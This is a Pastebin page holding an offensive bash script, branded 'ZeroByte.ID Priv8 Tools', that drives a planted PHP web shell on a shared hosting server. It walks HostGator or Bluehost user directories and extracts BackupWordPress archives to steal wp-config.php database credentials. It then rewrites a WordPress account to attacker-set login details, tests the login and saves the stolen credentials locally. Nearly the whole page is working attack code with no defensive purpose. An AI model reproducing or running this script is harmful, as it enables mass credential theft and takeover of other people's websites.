Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- # Using ZeroShell V 1.3
- # ZeroByte.ID Priv8 Tools
- SHELL="http://victim/zeroshell-v.1.3.php";
- HOST=$(curl -s -d 'cmd=hostname' ${SHELL}"?ext=shellcmd" | sed "s|readonly>|\nHost: |g" | sed 's|</textarea>|\n|g' | grep 'Host:' | awk '{print $2}');
- FILENAME='wpconfig_'${HOST}'.txt';
- function wpdomain() {
- user=$(echo ${1} | sed 's/@/%40/g' | sed 's/&/%26/g');
- pass=$(echo ${2} | sed 's/@/%40/g' | sed 's/&/%26/g');
- db=$(echo ${3} | sed 's/@/%40/g' | sed 's/&/%26/g');
- host=$(echo ${4} | sed 's/@/%40/g' | sed 's/&/%26/g');
- tpref=$(echo ${5});
- DOMAIN=$(curl -s -d "wpuser="${user} -d "wppass="${pass} -d 'wpdb='${db} -d 'wphost='${host} -X POST ${SHELL}"?grab=wp_options" | grep 'DOMAIN' | sed 's|\[DOMAIN\] ||g');
- if [[ -z $DOMAIN ]];then
- echo '[i] Failed Grab Domain';
- else
- echo '[*] Domain: '$DOMAIN;
- echo '[*] Domain: '$DOMAIN >> $FILENAME;
- UPASCHG=$(curl -s -d "wpuser="${user} -d "wppass="${pass} -d 'wpdb='${db} -d 'wphost='${host} -d "tpfx="${tpref} -X POST ${SHELL}"?grab=wp_users_updt");
- if [[ ${UPASCHG} =~ 'Record updated successfully' ]];then
- SITELOGIN=$(echo $DOMAIN'/wp-login.php' | sed 's|//wp-login.php|/wp-login.php|g');
- echo '[i] Try Login: '$SITELOGIN'|zerobyte|id1337'
- if [[ $(curl -s $SITELOGIN) =~ 'wp-submit' ]];then
- LOGIN=$(curl -s --cookie-jar wp-logincookie.tmp --data "log=zerobyte" --data "pwd=id1337" $SITELOGIN);
- if [[ ${LOGIN} =~ 'login_error' ]];then
- echo '[BAD] Login Failed';
- else
- echo '[OK] Login Successfully!';
- echo $SITELOGIN' user (zerobyte) pass (id1337)' >> wp_login.txt
- fi
- else
- echo '[BAD] Form Login Not Found!';
- fi
- else
- echo '[i] Failed Change User';
- fi
- fi
- }
- function miningblue() {
- CHK=$(curl -s ${SHELL}"?path="${1} | grep -e '\[D\]' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | sed 's|?path=||g' | wc -l);
- if [[ "$CHK" == "1" ]];then
- ASH=$(curl -s ${SHELL}"?path="${1} | grep -e '\[D\]' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | sed 's|?path=||g');
- GETGZ=$(curl -s ${SHELL}"?path="${ASH} | grep 'EXTRACT TO TMP' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | head -1);
- echo -ne '-- Loading |:::';
- DIRBUP=$(curl -s -d "extract=1" "${SHELL}${GETGZ}" | grep 'EXTRACTED' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | sed 's|?path=||g');
- echo -ne ':::';
- DIRUSER=$(curl -s ${SHELL}"?path="${DIRBUP} | grep -e '\[D\]' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | head -1);
- echo -ne ':::';
- CONFDIR=$(curl -s ${SHELL}${DIRUSER} | grep 'wp-config.php' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | head -1);
- echo -ne ':::';
- curl -s ${SHELL}${CONFDIR} > wp_config.php.temp;
- echo -ne ':::| 100%\n';
- WPUSER=$(cat wp_config.php.temp | grep -Po "(?<='(DB_USER'), ')[^']*");
- WPPASS=$(cat wp_config.php.temp | grep -Po "(?<='(DB_PASSWORD'), ')[^']*" | sed 's|\&|\&|g');
- DBNAME=$(cat wp_config.php.temp | grep -Po "(?<='(DB_NAME'), ')[^']*");
- WPHOST=$(cat wp_config.php.temp | grep -Po "(?<='(DB_HOST'), ')[^']*");
- TPREFX=$(cat wp_config.php.temp | grep '$table_prefix' | grep -Po "'\K.*?(?=')");
- if [[ -z $WPUSER ]];then
- echo '-- FAILED GRAB CONFIG.';
- echo '';
- elif [[ $WPUSER =~ 'DB_USER' ]]; then
- echo '[*] WP_User: '$WPUSER;
- echo '[*] WP_Pass: '$WPPASS;
- echo '[*] DB_Name: '$DBNAME;
- echo '[*] WP_Host: '$WPHOST;
- echo '[*] Table_Prefix: '$TPREFX;
- echo '[BAD] CONFIG FILE';
- echo '';
- echo 'WP_User: '$WPUSER >> $FILENAME;
- echo 'WP_Pass: '$WPPASS >> $FILENAME;
- echo 'DB_Name: '$DBNAME >> $FILENAME;
- echo 'WP_Host: '$WPHOST >> $FILENAME;
- echo '' >> $FILENAME;
- else
- echo '[*] WP_User: '$WPUSER;
- echo '[*] WP_Pass: '$WPPASS;
- echo '[*] DB_Name: '$DBNAME;
- echo '[*] WP_Host: '$WPHOST;
- echo '[*] Table_Prefix: '$TPREFX;
- wpdomain ${WPUSER} ${WPPASS} ${DBNAME} ${WPHOST} ${TPREFX}
- echo '';
- echo 'WP_User: '$WPUSER >> $FILENAME;
- echo 'WP_Pass: '$WPPASS >> $FILENAME;
- echo 'DB_Name: '$DBNAME >> $FILENAME;
- echo 'WP_Host: '$WPHOST >> $FILENAME;
- echo '' >> $FILENAME;
- fi
- ## DELBUP ##
- curl -s ${SHELL}"?action=rmdir&file="$DIRBUP -o /dev/null;
- else
- GRAB=$(curl -s ${SHELL}"?path="${1} | grep -e '\[D\]' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | sed 's|?path=||g');
- count=0;
- for ASH in $(echo $GRAB)
- do
- count=$[count+1];
- echo '['$i']['$count']';
- GETGZ=$(curl -s ${SHELL}"?path="${ASH} | grep 'EXTRACT TO TMP' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | head -1);
- echo -ne '-- Loading |:::';
- DIRBUP=$(curl -s -d "extract=1" "${SHELL}${GETGZ}" | grep 'EXTRACTED' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | sed 's|?path=||g');
- echo -ne ':::';
- DIRUSER=$(curl -s ${SHELL}"?path="${DIRBUP} | grep -e '\[D\]' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | head -1);
- echo -ne ':::';
- CONFDIR=$(curl -s ${SHELL}${DIRUSER} | grep 'wp-config.php' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | head -1);
- echo -ne ':::';
- curl -s ${SHELL}${CONFDIR} > wp_config.php.temp;
- echo -ne ':::| 100%\n';
- WPUSER=$(cat wp_config.php.temp | grep -Po "(?<='(DB_USER'), ')[^']*");
- WPPASS=$(cat wp_config.php.temp | grep -Po "(?<='(DB_PASSWORD'), ')[^']*" | sed 's|\&|\&|g');
- DBNAME=$(cat wp_config.php.temp | grep -Po "(?<='(DB_NAME'), ')[^']*");
- WPHOST=$(cat wp_config.php.temp | grep -Po "(?<='(DB_HOST'), ')[^']*");
- TPREFX=$(cat wp_config.php.temp | grep '$table_prefix' | grep -Po "'\K.*?(?=')");
- if [[ -z $WPUSER ]];then
- echo '-- FAILED GRAB CONFIG.';
- echo '';
- elif [[ $WPUSER =~ 'DB_USER' ]]; then
- echo '[*] WP_User: '$WPUSER;
- echo '[*] WP_Pass: '$WPPASS;
- echo '[*] DB_Name: '$DBNAME;
- echo '[*] WP_Host: '$WPHOST;
- echo '[*] Table_Prefix: '$TPREFX;
- echo '[BAD] CONFIG FILE';
- echo '';
- echo 'WP_User: '$WPUSER >> $FILENAME;
- echo 'WP_Pass: '$WPPASS >> $FILENAME;
- echo 'DB_Name: '$DBNAME >> $FILENAME;
- echo 'WP_Host: '$WPHOST >> $FILENAME;
- echo '' >> $FILENAME;
- else
- echo '[*] WP_User: '$WPUSER;
- echo '[*] WP_Pass: '$WPPASS;
- echo '[*] DB_Name: '$DBNAME;
- echo '[*] WP_Host: '$WPHOST;
- echo '[*] Table_Prefix: '$TPREFX;
- wpdomain ${WPUSER} ${WPPASS} ${DBNAME} ${WPHOST} ${TPREFX}
- echo '';
- echo 'WP_User: '$WPUSER >> $FILENAME;
- echo 'WP_Pass: '$WPPASS >> $FILENAME;
- echo 'DB_Name: '$DBNAME >> $FILENAME;
- echo 'WP_Host: '$WPHOST >> $FILENAME;
- echo '' >> $FILENAME;
- fi
- ## DELBUP ##
- curl -s ${SHELL}"?action=rmdir&file="$DIRBUP -o /dev/null;
- done
- fi
- }
- function mininggator() {
- HOME=$(curl -s ${SHELL}"?path="${1} | grep -e '\[D\]' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | sed 's|?path=||g');
- echo -ne '';
- USRX=$(curl -s ${SHELL}"?path="${HOME} | grep -e '\[D\]' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | sed 's|?path=||g');
- echo -ne '';
- PUBHTML=$(curl -s ${SHELL}"?path="${USRX} | grep -e '\[D\]' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | sed 's|?path=||g');
- echo -ne '';
- PUBLICHTML=$(curl -s ${SHELL}"?path="${PUBHTML} | grep -e '\[D\]' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | sed 's|?path=||g');
- if [[ -z $PUBLICHTML ]];then
- GETGZ=$(curl -s ${SHELL}"?path="${PUBHTML} | grep 'EXTRACT TO TMP' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | head -1);
- echo -ne '-- Loading |:::';
- DIRBUP=$(curl -s -d "extract=1" "${SHELL}${GETGZ}" | grep 'EXTRACTED' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | sed 's|?path=||g');
- echo -ne ':::';
- DIRUSER=$(curl -s ${SHELL}"?path="${DIRBUP} | grep -e '\[D\]' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | head -1);
- echo -ne ':::';
- CONFDIR=$(curl -s ${SHELL}${DIRUSER} | grep 'wp-config.php' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | head -1);
- echo -ne ':::';
- curl -s ${SHELL}${CONFDIR} > wp_config.php.temp;
- echo -ne ':::| 100%\n';
- WPUSER=$(cat wp_config.php.temp | grep -Po "(?<='(DB_USER'), ')[^']*");
- WPPASS=$(cat wp_config.php.temp | grep -Po "(?<='(DB_PASSWORD'), ')[^']*" | sed 's|\&|\&|g');
- DBNAME=$(cat wp_config.php.temp | grep -Po "(?<='(DB_NAME'), ')[^']*");
- WPHOST=$(cat wp_config.php.temp | grep -Po "(?<='(DB_HOST'), ')[^']*");
- TPREFX=$(cat wp_config.php.temp | grep '$table_prefix' | grep -Po "'\K.*?(?=')");
- if [[ -z $WPUSER ]];then
- echo '-- FAILED GRAB CONFIG.';
- echo '';
- elif [[ $WPUSER =~ 'DB_USER' ]]; then
- echo '[*] WP_User: '$WPUSER;
- echo '[*] WP_Pass: '$WPPASS;
- echo '[*] DB_Name: '$DBNAME;
- echo '[*] WP_Host: '$WPHOST;
- echo '[*] Table_Prefix: '$TPREFX;
- echo '[BAD] CONFIG FILE';
- echo '';
- echo 'WP_User: '$WPUSER >> $FILENAME;
- echo 'WP_Pass: '$WPPASS >> $FILENAME;
- echo 'DB_Name: '$DBNAME >> $FILENAME;
- echo 'WP_Host: '$WPHOST >> $FILENAME;
- echo '' >> $FILENAME;
- else
- echo '[*] WP_User: '$WPUSER;
- echo '[*] WP_Pass: '$WPPASS;
- echo '[*] DB_Name: '$DBNAME;
- echo '[*] WP_Host: '$WPHOST;
- echo '[*] Table_Prefix: '$TPREFX;
- wpdomain ${WPUSER} ${WPPASS} ${DBNAME} ${WPHOST} ${TPREFX}
- echo '';
- echo 'WP_User: '$WPUSER >> $FILENAME;
- echo 'WP_Pass: '$WPPASS >> $FILENAME;
- echo 'DB_Name: '$DBNAME >> $FILENAME;
- echo 'WP_Host: '$WPHOST >> $FILENAME;
- echo '' >> $FILENAME;
- fi
- curl -s ${SHELL}"?action=rmdir&file="$DIRBUP -o /dev/null;
- else
- count=0;
- for ASH in ${PUBLICHTML}
- do
- count=$[count+1];
- echo '['$i']['$count']';
- GETGZ=$(curl -s ${SHELL}"?path="${ASH} | grep 'EXTRACT TO TMP' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | head -1);
- echo -ne '-- Loading |:::';
- DIRBUP=$(curl -s -d "extract=1" "${SHELL}${GETGZ}" | grep 'EXTRACTED' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | sed 's|?path=||g');
- echo -ne ':::';
- DIRUSER=$(curl -s ${SHELL}"?path="${DIRBUP} | grep -e '\[D\]' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | head -1);
- echo -ne ':::';
- CONFDIR=$(curl -s ${SHELL}${DIRUSER} | grep 'wp-config.php' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | head -1);
- echo -ne ':::';
- curl -s ${SHELL}${CONFDIR} > wp_config.php.temp;
- echo -ne ':::| 100%\n';
- WPUSER=$(cat wp_config.php.temp | grep -Po "(?<='(DB_USER'), ')[^']*");
- WPPASS=$(cat wp_config.php.temp | grep -Po "(?<='(DB_PASSWORD'), ')[^']*" | sed 's|\&|\&|g');
- DBNAME=$(cat wp_config.php.temp | grep -Po "(?<='(DB_NAME'), ')[^']*");
- WPHOST=$(cat wp_config.php.temp | grep -Po "(?<='(DB_HOST'), ')[^']*");
- TPREFX=$(cat wp_config.php.temp | grep '$table_prefix' | grep -Po "'\K.*?(?=')");
- if [[ -z $WPUSER ]];then
- echo '-- FAILED GRAB CONFIG.';
- echo '';
- elif [[ $WPUSER =~ 'DB_USER' ]]; then
- echo '[*] WP_User: '$WPUSER;
- echo '[*] WP_Pass: '$WPPASS;
- echo '[*] DB_Name: '$DBNAME;
- echo '[*] WP_Host: '$WPHOST;
- echo '[*] Table_Prefix: '$TPREFX;
- echo '[BAD] CONFIG FILE';
- echo '';
- echo 'WP_User: '$WPUSER >> $FILENAME;
- echo 'WP_Pass: '$WPPASS >> $FILENAME;
- echo 'DB_Name: '$DBNAME >> $FILENAME;
- echo 'WP_Host: '$WPHOST >> $FILENAME;
- echo '' >> $FILENAME;
- else
- echo '[*] WP_User: '$WPUSER;
- echo '[*] WP_Pass: '$WPPASS;
- echo '[*] DB_Name: '$DBNAME;
- echo '[*] WP_Host: '$WPHOST;
- echo '[*] Table_Prefix: '$TPREFX;
- wpdomain ${WPUSER} ${WPPASS} ${DBNAME} ${WPHOST} ${TPREFX}
- echo '';
- echo 'WP_User: '$WPUSER >> $FILENAME;
- echo 'WP_Pass: '$WPPASS >> $FILENAME;
- echo 'DB_Name: '$DBNAME >> $FILENAME;
- echo 'WP_Host: '$WPHOST >> $FILENAME;
- echo '' >> $FILENAME;
- fi
- ## DELBUP ##
- curl -s ${SHELL}"?action=rmdir&file="$DIRBUP -o /dev/null;
- done
- fi
- }
- function hostcheck() {
- if [[ $HOST =~ 'hostgator.com' ]];then
- echo '[SERVER] HOSTGATOR';
- i=0;
- for USR in $(echo $USRJUMP)
- do
- i=$[i+1];
- echo '['$i'] '$USR;
- mininggator $USR
- done
- elif [[ $HOST =~ 'bluehost.com' ]];then
- echo '[SERVER] BLUEHOST';
- i=0;
- for USR in $(echo $USRJUMP)
- do
- i=$[i+1];
- echo '['$i'] '$USR;
- miningblue $USR
- done
- else
- echo '[BAD] FAILED IDENTIFY HOST';
- return 1;
- fi
- }
- USRJUMP=$(curl -s ${SHELL}"?ext=backupwordpress" | grep -o '] <a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^] <a href=["'"'"']//' -e 's/["'"'"']$//' | sed 's|?path=||g');
- cat << "EOF"
- _ _ _ _
- _______ _ __ ___ | |__ _ _| |_ ___ (_) __| |
- |_ / _ \ '__/ _ \| '_ \| | | | __/ _ \ | |/ _` |
- / / __/ | | (_) | |_) | |_| | || __/_| | (_| |
- /___\___|_| \___/|_.__/ \__, |\__\___(_)_|\__,_|
- |___/
- :: BACKUPWORDPRESS CONFIG GRAB & AUTO EDIT USER ::
- EOF
- echo '[HOSTNAME] '$HOST;
- if [ -z "$USRJUMP" ];then
- echo "[BAD] FAILED GRAB!";
- else
- hostcheck
- fi
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement